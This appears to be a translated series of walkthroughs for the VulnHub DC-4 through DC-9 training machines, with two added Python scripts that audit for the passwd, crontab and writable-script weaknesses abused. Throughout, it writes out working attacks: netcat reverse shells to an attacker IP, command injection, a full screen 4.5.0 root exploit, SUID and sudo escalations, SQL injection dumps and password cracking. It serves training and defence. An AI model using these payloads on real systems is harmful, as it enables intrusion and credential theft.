There is a teehee command that can be run as root; teehee appends content to a file.
Set the password to empty:
echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
Explanation of admin::0:0:::/bin/bash
[username]:[password]:[UID]:[GID]:[description]:[home directory]:[login shell]
Reference article
The password can also be set to something other than empty:
mkpasswd -m SHA-512 12345
Then:
sudo teehee -a /etc/passwd
12345:$6$OXVv4N3qtVc0LQeI$CPmgAD9tTpzpCu86IaC9gIx6MYta8/huc3utEd3WwyhUWSbDxKIwi/3XCAHjOqn.rT/lamYZTxbKDoJXkxXaa1:0:0:::/bin/bash
where -a is roughly equivalent to >>
Then switch user
cat /root/flag.txt
[ASCII-art banner]

Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
Write a new scheduled task into /etc/crontab
All time fields are *, meaning it runs every minute; the entry changes /bin/sh's mode to 4777, so a non-root user can run it and has root privileges while it runs.
sudo teehee /etc/crontab
* * * * * root chmod 4777 /bin/sh
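Both the /etc/passwd append and the crontab entry above leave a clear trace. The following Python audit, added here and not part of the original walkthrough, parses the seven colon-separated fields described above and flags empty password fields, UID 0 accounts other than root, and root cron jobs that set SUID bits. The sample file contents are constructed to mirror this write-up.

```python
import re
from typing import Dict, List

# Constructed sample: a baseline /etc/passwd after the line the walkthrough appends.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:,,,:/home/jim:/bin/bash
charles:x:1002:1002:,,,:/home/charles:/bin/bash
admin::0:0:::/bin/bash
"""

# Constructed sample: a system crontab with the entry from the cron variant.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * * root chmod 4777 /bin/sh
"""

PASSWD_FIELDS = ["name", "passwd", "uid", "gid", "gecos", "home", "shell"]


def parse_passwd(text: str) -> List[Dict[str, str]]:
    """Split every non-comment line into the seven colon-separated fields
    ([username]:[password]:[UID]:[GID]:[description]:[home]:[shell]).
    A malformed line is kept as an 'error' record instead of being dropped."""
    records = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != len(PASSWD_FIELDS):
            records.append({"name": line,
                            "error": f"line {lineno}: expected 7 fields, got {len(parts)}"})
            continue
        records.append(dict(zip(PASSWD_FIELDS, parts)))
    return records


def audit_passwd(text: str) -> List[str]:
    """Findings for the traces left by appending admin::0:0:::/bin/bash."""
    findings = []
    for rec in parse_passwd(text):
        if "error" in rec:
            findings.append(rec["error"])
            continue
        if rec["passwd"] == "":
            findings.append(f"{rec['name']}: empty password field (no password required)")
        if rec["uid"] == "0" and rec["name"] != "root":
            findings.append(f"{rec['name']}: UID 0 account other than root")
        if rec["home"] == "":
            findings.append(f"{rec['name']}: empty home directory")
    return findings


# chmod with a leading 2/4/6 octal digit (setgid/setuid) or a symbolic +s.
SUID_CHMOD = re.compile(r"\bchmod\b.*?(\b[2467][0-7]{3}\b|[ugoa]*\+[rwx]*s)")


def audit_crontab(text: str) -> List[str]:
    """Findings for system-crontab jobs (five time fields plus a user) that run as
    root and set SUID/SGID bits, such as `* * * * * root chmod 4777 /bin/sh`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or "=" in s.split()[0]:
            continue  # blank, comment, or VAR=value line
        parts = s.split(None, 6)
        if len(parts) < 7:
            continue  # not a complete job line
        user, command = parts[5], parts[6]
        if user == "root" and SUID_CHMOD.search(command):
            findings.append(f"line {lineno}: root cron job sets SUID/SGID bits: {command}")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD) + audit_crontab(SAMPLE_CRONTAB):
        print(finding)
```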
http://www.javashuo.com/article/p-ganpvbvi-nw.html
Target download: https://download.vulnhub.com/dc/DC-5.zip
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.149
Host is up (0.00027s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE VERSION
80/tcp  open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Welcome
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version   port/proto  service
|   100000  2,3,4     111/tcp     rpcbind
|   100000  2,3,4     111/udp     rpcbind
|   100000  3,4       111/tcp6    rpcbind
|   100000  3,4       111/udp6    rpcbind
|   100024  1         37412/udp   status
|   100024  1         49448/tcp6  status
|   100024  1         49885/udp6  status
|_  100024  1         56530/tcp   status
MAC Address: 00:0C:29:1A:8C:74 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.27 ms 192.168.124.149

Nmap scan report for 192.168.124.254
Ports 80 and 111 are open; the OS is Linux, the web server nginx 1.6.2
Probe the ports further
nmap -sS 192.168.124.149 -p 1-65535
Nmap scan report for 192.168.124.149
Host is up (0.00089s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
56530/tcp open  unknown
MAC Address: 00:0C:29:1A:8C:74 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 2.46 seconds
Port 56530 is open
Look at port 80
Tried XSS; there is none
A directory scan found a special footer.php
Visiting it, the date keeps changing
The date in the comment area also keeps changing
So thankyou.php probably includes the footer.php page
Tried file inclusion to read thankyou.php and other files; they can be read successfully
Try writing to a file and then including it; writable candidates are files such as the web server's log files, the SSH login log, temp files and so on
See my earlier notes on file inclusion: https://lnng.top/posts/6b68.html
Here it's best to include the web server's log file, because the SSH port is unknown and the other methods are hard to exploit
Make one request containing a webshell
Connect with AntSword; the connection succeeds
Create a phpshell file under /var/tmp/ and write:
<?php system("nc 192.168.124.139 4444 -e /bin/sh"); ?>
Kali side
nc -l -p 4444
Upgrade the shell
python -c 'import pty;pty.spawn("/bin/bash")'
Try SUID privilege escalation
find / -perm -u=s -type f 2>/dev/null
GNU Screen is free software developed by the GNU project for switching between command-line terminals. With it a user can connect to several local or remote command-line sessions at the same time and switch freely between them.
GNU Screen can be seen as a command-line version of a window manager: it provides a unified interface and the corresponding functions for managing several sessions.
Search for exploits
searchsploit screen 4.5.0
Two usable exploits are found
Use the first one
First copy 41154.sh to the desktop
cp /usr/share/exploitdb/exploits/linux/local/41154.sh 41154.sh
cat 41154.sh
#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
It tells us how to use it
First write the first part into libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
Then compile
gcc -fPIC -shared -ldl -o libhax.so libhax.c
Save the middle part into rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
Then compile
gcc -o rootshell rootshell.c
Save the remaining code into dc5.sh
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell
and enter in vim (so the file gets Unix line endings):
:set ff=unix
Upload the three files into /tmp
Then change dc5.sh's permissions
chmod 777 dc5.sh
Then execute
./dc5.sh
Read the flag
cat thisistheflag.txt
[ASCII-art banner]

Once again, a big thanks to all those who do these little challenges, and especially all those who give me feedback - again, it's all greatly appreciated. :-)

I also want to send a big thanks to all those who find the vulnerabilities and create the exploits that make these challenges possible.
https://www.jianshu.com/p/8f6e1e4d44b9
https://www.anquanke.com/post/id/178958
Target download: https://download.vulnhub.com/dc/DC-6.zip
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.150 Host is up (0.00049s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA) | 256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA) |_ 256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519) 80/tcp open http Apache httpd 2.4.25 ((Debian)) |_http-server-header: Apache/2.4.25 (Debian) |_http-title: Did not follow redirect to http://wordy/ |_https-redirect: ERROR: Script execution failed (use -d to debug) MAC Address: 00:0C:29:4C:2C:9C (VMware) Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE HOP RTT ADDRESS 1 0.49 ms 192.168.124.150
Ports 80 and 22 (ssh) are open; the OS is Linux
Scan the ports further
nmap -sS 192.168.124.150 -p 1-65535
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
No new ports
Brute-force ssh (unsuccessful)
nmap --script=ssh-brute 192.168.124.150
Port 80 cannot be opened; it redirects to a wordy page, same as before
Edit the local DNS (hosts file)
linux: vim /etc/hosts
windows: C:\Windows\System32\drivers\etc
Add
192.168.124.150 wordy
(according to your own IP)
Plugin fingerprinting shows a wordpress+apache setup
So, as before, scan it with wpscan
wpscan --url http://wordy/ --enumerate u
The scan turns up several usernames
Save them to username.txt
Then there is a hint (honestly, who would have guessed this)
Hint: https://www.vulnhub.com/entry/dc-6,315/
cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt
Then brute-force
wpscan --url http://wordy/ -U username.txt -P password.txt
Successfully brute-forced an account and password
mark / helpdesk01
Login address
http://wordy/wp-admin/
Search for vulnerabilities:
https://www.exploit-db.com/exploits/45274
Found a command execution; the vulnerable address is
http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Start a listener on kali
netcat -l -p 4444
Change the command at this spot to bounce a shell back
baidu.com | nc -e /bin/bash 192.168.124.139 4444
Upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
In the home directory found a hint about ssh login
/home/mark/stuff
Found a login account and password
Things to do:
- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
ssh login
Tried SUID privilege escalation, found nothing usable
find / -perm -u=s -type f 2>/dev/null
Check what the current user can run
sudo -l
Found /home/jens/backups.sh can be run; opening it, it is a decompression script
Write a command into it, then run it as jens
echo "/bin/bash" >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
Successfully switched to the jens user
Keep checking the runnable commands: nmap can be run as root
sudo -l
So we need nmap to open a shell and we get root
How to run a shell from nmap
echo "os.execute('/bin/bash')">/tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
cat ./theflag.txt
Successfully got the flag
[ASCII-art banner of the DC-6 flag]
Congratulations!!! Hope you enjoyed DC-6. Just wanted to send a big thanks out there to all those who have provided feedback, and who have taken time to complete these little challenges. If you enjoyed this CTF, send me a tweet via @DCAU7.
Target VM download: https://download.vulnhub.com/dc/DC-7.zip
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.151
Host is up (0.00037s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 d0:02:e9:c7:5d:95:32:ab:10:99:89:84:34:3d:1e:f9 (RSA)
|   256 d0:d6:40:35:a7:34:a9:0a:79:34:ee:a9:6a:dd:f4:8f (ECDSA)
|_  256 a8:55:d5:76:93:ed:4f:6f:f1:f7:a1:84:2f:af:bb:e1 (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: Drupal 8 (https://www.drupal.org)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.txt /web.config /admin/
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/
| /user/password/ /user/login/ /user/logout/ /index.php/admin/
|_/index.php/comment/reply/
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Welcome to DC-7 | D7
MAC Address: 00:0C:29:52:A9:5B (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 192.168.124.151
Ports 22 and 80 open, OS Linux; a further scan found no other ports
nmap 192.168.124.151 -p 1-65535
Brute-force ssh
nmap --script=ssh-brute 192.168.124.151
Look at port 80 for further information: the CMS is Drupal 8, and it tells us this one is not about brute force
Tried the vulnerabilities in msf, no luck; by version on exploit-db, also no luck
Baidu says the hint means to search for this person; that led to a github account, and then to the site's source code on github
Then in config.php we found the database connection account and password; tried them over ssh (the earlier brute force of the account and password had failed, as you can see)
<?php
$servername = "localhost";
$username = "dc7user";
$password = "MdR3xOgB7#dW";
$dbname = "Staff";
$conn = mysqli_connect($servername, $username, $password, $dbname);
?>
First look around at the basic files; in mbox found a file run by root (had to Baidu this, I could not see it)
cat mbox
cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
It looks like a backup sh script
Checking the permissions, both www-data and root have access
So the idea: if we get www-data privileges and write a task into this script, we can get a root reverse shell, because it is started as root on a schedule
Looking at this backup script, it is a drush command; drush can change a user's password
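The weak point in both DC-6 (a backups.sh that another user can run via sudo) and DC-7 (a backups.sh that root runs on a schedule but www-data can write) is the same: a script executed with someone else's privileges is writable by a lower-privileged account. The following Python audit is an added example, not code from the writeup or from the DC machines; the sample scripts it checks are constructed in a temporary directory.

```python
"""Audit scripts that run with elevated rights (root cron jobs, sudo targets)
for write access by less-privileged accounts. Added example for this writeup,
not part of the DC machines; the sample scripts are constructed."""
import os
import stat
import tempfile


def mode_findings(mode, uid, trusted_uids=(0,)):
    """Pure check on a file's st_mode and st_uid.
    Returns a list of findings; an empty list means the script is sane."""
    findings = []
    if uid not in trusted_uids:
        findings.append(f"owned by uid {uid}, which is not a trusted account")
    if mode & stat.S_IWGRP:
        findings.append("group-writable")
    if mode & stat.S_IWOTH:
        findings.append("world-writable")
    return findings


def audit_script(path, trusted_uids=(0,)):
    """Stat `path` and its directory and report anything that would let a
    non-trusted user change what root (or a sudo target user) executes."""
    st = os.lstat(path)
    findings = mode_findings(st.st_mode, st.st_uid, trusted_uids)
    if stat.S_ISLNK(st.st_mode):
        findings.append("is a symlink; its target can be repointed")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    others_can_write = parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
    if others_can_write and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory is writable by others, so the file can be replaced")
    return findings


def demo():
    """Constructed sample: one script with the loose 0777 mode the writeup
    sets with chmod 777, one with a sane 0755. Returns both finding lists."""
    tmp = tempfile.mkdtemp()
    loose = os.path.join(tmp, "backups.sh")
    tight = os.path.join(tmp, "safe.sh")
    for path, mode in ((loose, 0o777), (tight, 0o755)):
        with open(path, "w") as fh:
            fh.write("#!/bin/bash\necho backup\n")
        os.chmod(path, mode)
    # Treat the demo's own uid as trusted so only the mode bits are judged.
    trusted = (os.getuid(),)
    return audit_script(loose, trusted), audit_script(tight, trusted)


if __name__ == "__main__":
    for name, result in zip(("backups.sh", "safe.sh"), demo()):
        print(name, "->", result or "OK")
```

Run it against every script referenced from /etc/cron* and from `sudo -l` output, with the default trusted uid of 0, to catch the two misconfigurations above.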
drush sql-dump --result-file=/home/dc7user/backups/website.sql
So try changing the password
cd /var/www/html
drush user-password admin --password="123456"
Try logging in; login successful
This spot supports extensions, so to create a webshell we can use a plugin; per the walkthrough, download a php plugin
Plugin download: https://www.drupal.org/project/php
Download the gz format, upload it, then click the marker shown in the figure
Then tick the options in the figure below and click install at the bottom
Back on the home page, click the item in the figure below to create an article
Write a simple webshell
Note: the text format below must be set to php code
Then connect with AntSword
Bounce it back to kali; actually you could bounce a shell directly from the webshell
Upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
Then write the reverse shell command into the scheduled sh to get a root reverse shell
echo "nc -e /bin/bash 192.168.124.139 7777" >> /opt/scripts/backups.sh
Read the flag
cd /root
ls
theflag.txt
cat theflag.txt
[ASCII-art banner of the DC-7 flag]
Congratulations!!! Hope you enjoyed DC-7. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 If you enjoyed this CTF, send me a tweet via @DCAU7.
https://www.anquanke.com/post/id/187876#h3-3
Target VM download: https://download.vulnhub.com/dc/DC-8.zip
Nmap scan report for 192.168.124.152
Host is up (0.00058s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
|   2048 35:a7:e6:c4:a8:3c:63:1d:e1:c0:ca:a3:66:bc:88:bf (RSA)
|   256 ab:ef:9f:69:ac:ea:54:c6:8c:61:55:49:0a:e7:aa:d9 (ECDSA)
|_  256 7a:b2:c6:87:ec:93:76:d4:ea:59:4b:1b:c6:e8:73:f2 (ED25519)
80/tcp open  http    Apache httpd
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache
|_http-title: Welcome to DC-8 | DC-8
MAC Address: 00:0C:29:AE:A9:C3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.124.152
Found ports 80 and 22; OS Linux
A further scan found no other ports
nmap 192.168.124.152 -p 1-65535
Brute-force ssh, no result
nmap --script=ssh-brute 192.168.124.152
Look at port 80: cms Drupal 7
The basic exploits in msf had no effect; there is an id parameter here, so try SQL injection
First try simple error-based injection; there are no defenses, it injects directly
Then let sqlmap run it all
http://192.168.124.152/?nid=1%20and%20updatexml(1,concat(0x7e,database()),1)#
sqlmap -u http://192.168.124.152/?nid=1 -D d7db -T users --dump
Successfully dumped the accounts and password hashes
[05:16:06] [INFO] resumed: 'admin'
[05:16:06] [INFO] resumed: '1567489015'
[05:16:06] [INFO] resumed: 'dc8blah@dc8blah.org'
[05:16:06] [INFO] resumed: '1567766626'
[05:16:06] [INFO] resumed: 'dcau-user@outlook.com'
[05:16:06] [INFO] resumed: '$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z'
[05:16:06] [INFO] resumed: '0'
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'filtered_html'
[05:16:06] [INFO] resumed: '1'
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'Australia/Brisbane'
[05:16:06] [INFO] resumed: '1'
[05:16:06] [INFO] resumed: '1567498512'
[05:16:06] [INFO] resumed: 'a:5:{s:16:"ckeditor_default";s:1:"t";s:20:"ckeditor_show_toggle";s:1:"t";s:14:"ckeditor_width";s:4:...
[05:16:06] [INFO] resumed: ''
[05:16:06] [INFO] resumed: 'john'
[05:16:06] [INFO] resumed: '1567489250'
[05:16:06] [INFO] resumed: 'john@blahsdfsfd.org'
[05:16:06] [INFO] resumed: '1567497783'
[05:16:06] [INFO] resumed: 'john@blahsdfsfd.org'
[05:16:06] [INFO] resumed: '$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF'
[05:16:06] [INFO] resumed: '0'
[05:16:06] [INFO] resumed: ''
Crack the hashes with john (the hint pointed to this)
Successfully cracked john's password: turtle
C:\root\Desktop> john pass.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Drupal7, $S$ [SHA512 128/128 AVX 2x])
No password hashes left to crack (see FAQ)
C:\root\Desktop> john --show pass.txt
john:turtle

1 password hash cracked, 0 left
Scan directories
dirb http://192.168.124.152
Found the user directory is the login page
Login successful; this spot allows adding php code, so try a reverse shell directly
http://192.168.124.152/node/3#overlay=node/3/webform/configure
<p>flag</p>
<?php system("nc -e /bin/sh 192.168.124.139 4444"); ?>
Then enter anything on this page, click submit, and wait for the shell to connect back
Then upgrade to an interactive shell
python -c 'import pty;pty.spawn("/bin/bash")'
First try SUID privilege escalation
find / -perm -u=s -type f 2>/dev/null
www-data@dc-8:/var/www/html$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/sbin/exim4
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/bin/ping
/bin/su
/bin/umount
/bin/mount
Found an unusual one, exim4; search for vulnerabilities
Try this vulnerability
First copy it out
cp /usr/share/exploitdb/exploits/linux/local/46996.sh 46996.sh
Convert it to unix line endings so it runs
Start an HTTP server (or upload it over the AntSword connection)
python -m SimpleHTTPServer
Then download it
wget http://192.168.124.139:8000/46996.sh
It contains usage instructions
chmod 777 46996.sh
./46996.sh -m netcat
Brilliant - you have succeeded!!!
[ASCII-art banner of the DC-8 flag]
Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm also sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42
This challenge was largely based on two things:
1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile.
2. A suggestion from @theart42
The answer to that question is...
If you enjoyed this CTF, send me a tweet via @DCAU7.
https://blog.csdn.net/weixin_43583637/article/details/102828013
https://fan497.top/2020/11/17/vulnhub-DC8/
Target VM download: https://download.vulnhub.com/dc/DC-9.zip
nmap -sS -A 192.168.124.0/24
Nmap scan report for 192.168.124.153
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:20:FE:11 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.41 ms 192.168.124.153
Ports 80 and 22 (ssh) open; OS Linux
Further port scan (no new ports found)
nmap 192.168.124.153 -p 1-65535
Brute-force ssh
nmap --script=ssh-brute 192.168.124.153
Look at port 80; it tells us to look at the other directories
Tested the manage function, seems fine; found SQL injection in the search
Run sqlmap directly; it finds three databases
sqlmap -u "http://192.168.124.153/results.php" --data "search=" --dbs
Continue with the tables
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D users --tables
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D users -T UserDetails --dump
+------+------------+---------------------+-----------+-----------+---------------+
| id   | lastname   | reg_date            | username  | firstname | password      |
+------+------------+---------------------+-----------+-----------+---------------+
| 17   | Morrison   | 2019-12-29 16:58:28 | janitor2  | Scott     | Hawaii-Five-0 |
| 16   | Trump      | 2019-12-29 16:58:26 | janitor   | Donald    | Ilovepeepee   |
| 15   | McScoots   | 2019-12-29 16:58:26 | scoots    | Scooter   | YR3BVxxxw87   |
| 14   | Buffay     | 2019-12-29 16:58:26 | phoebeb   | Phoebe    | smellycats    |
| 13   | Geller     | 2019-12-29 16:58:26 | monicag   | Monica    | 3248dsds7s    |
| 12   | Geller     | 2019-12-29 16:58:26 | rossg     | Ross      | ILoveRachel   |
| 11   | Green      | 2019-12-29 16:58:26 | rachelg   | Rachel    | yN72#dsd      |
| 10   | Tribbiani  | 2019-12-29 16:58:26 | joeyt     | Joey      | Passw0rd      |
| 9    | Bing       | 2019-12-29 16:58:26 | chandlerb | Chandler  | UrAG0D!       |
| 8    | Rubble     | 2019-12-29 16:58:26 | bettyr    | Betty     | BamBam01      |
| 7    | Flintstone | 2019-12-29 16:58:26 | wilmaf    | Wilma     | Pebbles       |
| 6    | Mouse      | 2019-12-29 16:58:26 | jerrym    | Jerry     | B8m#48sd      |
| 5    | Cat        | 2019-12-29 16:58:26 | tomc      | Tom       | TC&TheBoyz    |
| 4    | Rubble     | 2019-12-29 16:58:26 | barneyr   | Barney    | RocksOff      |
| 3    | Flintstone | 2019-12-29 16:58:26 | fredf     | Fred      | 4sfd87sfd1    |
| 2    | Dooley     | 2019-12-29 16:58:26 | julied    | Julie     | 468sfdfsd2    |
| 1    | Moe        | 2019-12-29 16:58:26 | marym     | Mary      | 3kfs86sfd     |
+------+------------+---------------------+-----------+-----------+---------------+
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff --tables
Two tables reported
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users        |
+--------------+
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff -T Users --dump
The Users table
Database: Staff
Table: Users
[1 entry]
+--------+----------+----------------------------------+
| UserID | Username | Password                         |
+--------+----------+----------------------------------+
| 1      | admin    | 856f5de590ef37314e7c3bdf6f8a66dc |
+--------+----------+----------------------------------+
The StaffDetails table
sqlmap -u "http://192.168.124.153/results.php" --data "search=" -D Staff -T StaffDetails --dump
Database: Staff
Table: StaffDetails
[17 entries]
+------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id   | email                 | phone          | lastname   | reg_date            | firstname | position                      |
+------+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 2    | julied@example.com    | 46457131654    | Dooley     | 2019-05-01 17:32:00 | Julie     | Human Resources               |
| 17   | janitor2@example.com  | 47836546413    | Morrison   | 2019-12-24 03:41:04 | Scott     | Assistant Replacement Janitor |
| 15   | scoots@example.com    | 454786464      | McScoots   | 2019-05-01 20:16:33 | Scooter   | Resident Cat                  |
| 13   | monicag@example.com   | 8092432798     | Geller     | 2019-05-01 17:32:00 | Monica    | Marketing                     |
| 11   | rachelg@example.com   | 823897243978   | Green      | 2019-05-01 17:32:00 | Rachel    | Personal Assistant            |
| 9    | chandlerb@example.com | 189024789      | Bing       | 2019-05-01 17:32:00 | Chandler  | President - Sales             |
| 7    | wilmaf@example.com    | 243457487      | Flintstone | 2019-05-01 17:32:00 | Wilma     | Accounts                      |
| 5    | tomc@example.com      | 802438797      | Cat        | 2019-05-01 17:32:00 | Tom       | Driver                        |
| 3    | fredf@example.com     | 46415323       | Flintstone | 2019-05-01 17:32:00 | Fred      | Systems Administrator         |
| 1    | marym@example.com     | 46478415155456 | Moe        | 2019-05-01 17:32:00 | Mary      | CEO                           |
| 16   | janitor@example.com   | 65464646479741 | Trump      | 2019-12-23 03:11:39 | Donald    | Replacement Janitor           |
| 14   | phoebeb@example.com   | 43289079824    | Buffay     | 2019-05-01 17:32:02 | Phoebe    | Assistant Janitor             |
